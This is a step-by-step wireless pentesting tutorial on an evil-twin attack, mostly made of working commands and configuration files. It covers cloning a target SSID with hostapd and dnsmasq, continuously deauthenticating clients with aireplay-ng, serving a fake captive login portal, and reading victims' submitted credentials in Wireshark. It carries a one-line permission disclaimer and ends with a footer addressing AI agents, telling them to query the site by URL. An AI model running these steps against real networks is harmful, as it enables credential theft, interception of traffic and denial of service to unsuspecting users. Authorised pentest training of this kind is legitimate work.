# Evil-Twin Attack

{% hint style="danger" %}
This is for educational purposes and only to be performed on networks you have permission to do so.
{% endhint %}

Basic info on Wireless can be found [here](broken://pages/qn5h5KMv9pZnd7ZieX2Z).\
\
This will be a walk through on performing an [Evil Twin wireless attack](https://www.varonis.com/blog/evil-twin-attack) and [Captive Portals](https://www.linksys.com/what-is-a-captive-portal.html).

An evil twin is a fake wireless access point(AP) that looks like a real one. The concept is to set up a malicious wireless network with the same SSID name as the target.

This is not required to have a WiFi Adapter that supports monitor mode, also known as packet injection. Though this will required if kicking clients off their network to connect to ours.

## Hardware

I myself have and recommend these adapters:

* [Alfa AWUS036ACM](https://www.amazon.com/Alfa-AWUS036ACM-Long-Range-Dual-Band-Wireless/dp/B073X6RL9D) <-- Capable of 2.4GHz and 5GHz
* [Alfa AWUS036ACHM](https://www.amazon.com/gp/product/B08SJBV1N3/ref=ox_sc_act_title_1?smid=A20G3A026MV70R\&psc=1) <-- Capable of 2.4GHz and 5GHz
* [Alfa AWUS036ACH](https://www.amazon.com/dp/B08SJC78FH?ref_=cm_sw_r_cp_ud_dp_PSZZG6J9X0XH40GXB685) <-- Capable of 2.4GHz and 5GHz (This more than likely \*will\* require driver installation)
* [Panda Wireless PAU09 N600](https://www.amazon.com/Panda-Wireless-PAU09-Adapter-Antennas/dp/B01LY35HGO) <-- Capable of 2.4GHz and 5GHz
* [Alfa AWUS036NEH](https://www.amazon.com/AWUS036NEH-Range-WIRELESS-802-11b-USBAdapter/dp/B0035OCVO6)
* [Alfa AWUS036NH](https://www.amazon.com/Alfa-AWUS036NH-802-11g-Wireless-Long-Range/dp/B003YIFHJY)
* [Panda Wireless PAU05](https://www.amazon.com/Panda-300Mbps-Wireless-USB-Adapter/dp/B00EQT0YK2)
* [TP-Link TL-WN722N](https://www.amazon.com/TP-Link-TL-WN722N-Wireless-network-Adapter/dp/B002SZEOLG)
* [Ralink USB WiFi RT5370](https://www.amazon.com/Ralink-RT5370-Raspberry-Adapter-Function/dp/B019XUDHFC)

You can also use a device such as [WiFi Pineapple](https://shop.hak5.org/products/wifi-pineapple). This primarily works on open networks.

First we install the prerequisites

```
sudo apt install -y dnsmasq and hostapd aircrack-ng
```

## Finding target

First we find our target, I will target "Open-WiFi" in this example. we use airodump for this

```
sudo airodump-ng (interface) 
```

<figure><img src="/files/vVuXuvjxhs6eFAIud9WH" alt=""><figcaption></figcaption></figure>

Kill process that may interfere

```
sudo airmon-ng check kill
```

<figure><img src="/files/KZgBXjZNF6wm7MVw5w9u" alt=""><figcaption></figcaption></figure>

now put the interface into monitor mode if we're deauthenticating a client.

```
sudo airmon-ng start (interface)
```

<figure><img src="/files/DmbZBKhzM9EHxOScJQ4K" alt=""><figcaption></figcaption></figure>

## Setup AP

Create `dnsmaqs.conf` file

```
# Set the wifi interface
interface=(interface)

# Set the IP range that can be given to clients
dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,8h

# Set the gateway IP address
dhcp-option=3,10.0.0.1

# Set DNS server address
dhcp-option=6,10.0.0.1

# Set Server
server=8.8.8.8

# logs
log-queries
log-dhcp

# Redirect all requests to 10.0.0.1
#address=/#/10.0.0.1

# Redirect google to 10.0.0.1
#address=/google.com/10.0.0.1
#address=/www.google.com/10.0.0.1
#address=/google.com/www.google.com.com/10.0.0.1
```

<figure><img src="/files/LuOT5RZdqT24216kfbmq" alt=""><figcaption></figcaption></figure>

Note to uncomment lines. if we uncomment the `#address=/#/10.0.0.1` this will let clients connect but they will not get internet access as the pound sign(`#`) is a wildcard for dnsmasq. So they will connect to the AP, then immediately asked to sign-in with the Evil Portal that is setup.

So instead we can redirect websites back to our Evil Portal instead.

Create `hostapd.conf` and fill in with target info

```
interface=(interface)
driver=nl80211
ssid=(Target AP)
hw_mode=g
channel=(Target channel)
macaddr_acl=0
ignore_broadcast_ssid=0
```

<figure><img src="/files/HaDKgl5c8CILH21f0VPa" alt=""><figcaption></figcaption></figure>

Assign the interface a gateway and netmask

```
sudo ifconfig (interface) up 10.0.0.1 netmask 255.255.255.0
```

Add the routing table

```
sudo route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
```

Setup an easy script for IP with:

```
sudo iptables --flush
sudo iptables --table nat --append POSTROUTING --out-interface (internet interface) -j MASQUERADE 
sudo iptables --append FORWARD --in-interface (wireless interface) -j ACCEPT 
sudo iptables -t nat -A POSTROUTING -j MASQUERADE
sudo echo 1 > /proc/sys/net/ipv4/ip_forward
```

<figure><img src="/files/vGVXz60BMrQsDBZnH1qj" alt=""><figcaption></figcaption></figure>

I named mine IP-Tables.sh. Make it executable and run it

```
chmod +x IP-Tables.sh
sudo ./IP-Tables.sh
```

If you want the AP setup without using a captive portal, just run dnsmasq and hostapd

Start dnsmasq with

```
sudo dnsmasq -C (path/to/dnsmasq.conf)
```

Start hostapd with

```
sudo hostapd (path/to/hostapd.conf)
```

We can run the command with a -B at the end to push it to the background. Though if we do this, we don't see when a client connects

```
sudo hostapd (path/to/hostapd.conf) -B
```

### Captive Portals

Put your captive portal files, and put them in the `/var/www/html/` directory.

[Example Portals here](https://github.com/Th4ntis/Evil-Portals.git)

Edit `/etc/apache2/sites-enabled/000-default.conf` and add the following to the end

```
sudo nano /etc/apache2/sites-enabled/000-default.conf
```

```
<Directory "/var/www/html">
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_HOST} ^www\.(.*)$ [NC]
RewriteRule ^(.*)$ http://%1/$1 [R=301,L]

RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule ^(.*)$ / [L,QSA]
</Directory>
```

<figure><img src="/files/qprPd1U3YiPCUtNhTICe" alt=""><figcaption></figcaption></figure>

Start the web server

```
sudo service apache2 start
```

Start dnsmasq with:

```
sudo dnsmasq -C (path/to/dnsmasq.conf)
```

Start hostapd AP with:

```
sudo hostapd (path/to/hostapd.conf)
```

We can run the command with a -B at the end to push it to the background. Though if we do this, we don't see when a client connects

```
sudo hostapd (path/to/hostapd.conf) -B
```

<figure><img src="/files/CfsD7MFG6BkKCyVF3RKC" alt=""><figcaption></figcaption></figure>

Once we're ready, we can disconnect clients from their network to connect to ours with aireplay.

```
sudo aireplay-ng -0 0 -a (BSSID) (interface)
```

OR if we want to deauth a specific client:

```
sudo aireplay-ng -0 0 -a (bssid) -c (Client MAC Address) (interface)
```

the `-0 0` will send deauth packets continuously until stopped. we can change it to `-0 10` to send just 10 deauth packets.

<figure><img src="/files/KBhJGxtpBYfeb7CDEb9c" alt=""><figcaption></figcaption></figure>

## Post connection

Once they are connected, or even before, we can start intercepting traffic with whatever tools we want, like [Wireshark](broken://pages/nXzTB6Vpwku2XX1R92Yl), [tshark](https://www.wireshark.org/docs/man-pages/tshark.html), [tcpdump](https://www.tcpdump.org/), etc. In this case I'll use wireshark on `wlan0`, the interface I was broadcasting from.

<figure><img src="/files/DI7sJUe3OiefjKBVwsIY" alt=""><figcaption></figcaption></figure>

As the user attempts to go to any page, they are taken to a login portal, asked enter a username/password on the portal and it will be captured.

We look for `HTTP Post Request` , then HTML Form URL Encoded, we will see their credentials.

<figure><img src="/files/uvy5O1FKZaBdmRXkUEou" alt=""><figcaption></figcaption></figure>

#### Wireshark to filter for packets

* `dns and ip.adr=(IP)` to see sites they are going to
* `frame contains (word)` will search for various words
* `http.request.method=="POST"` will show us login info.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://cybersec.th4ntis.com/processes/wireless-pentesting/evil-twin-attack.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.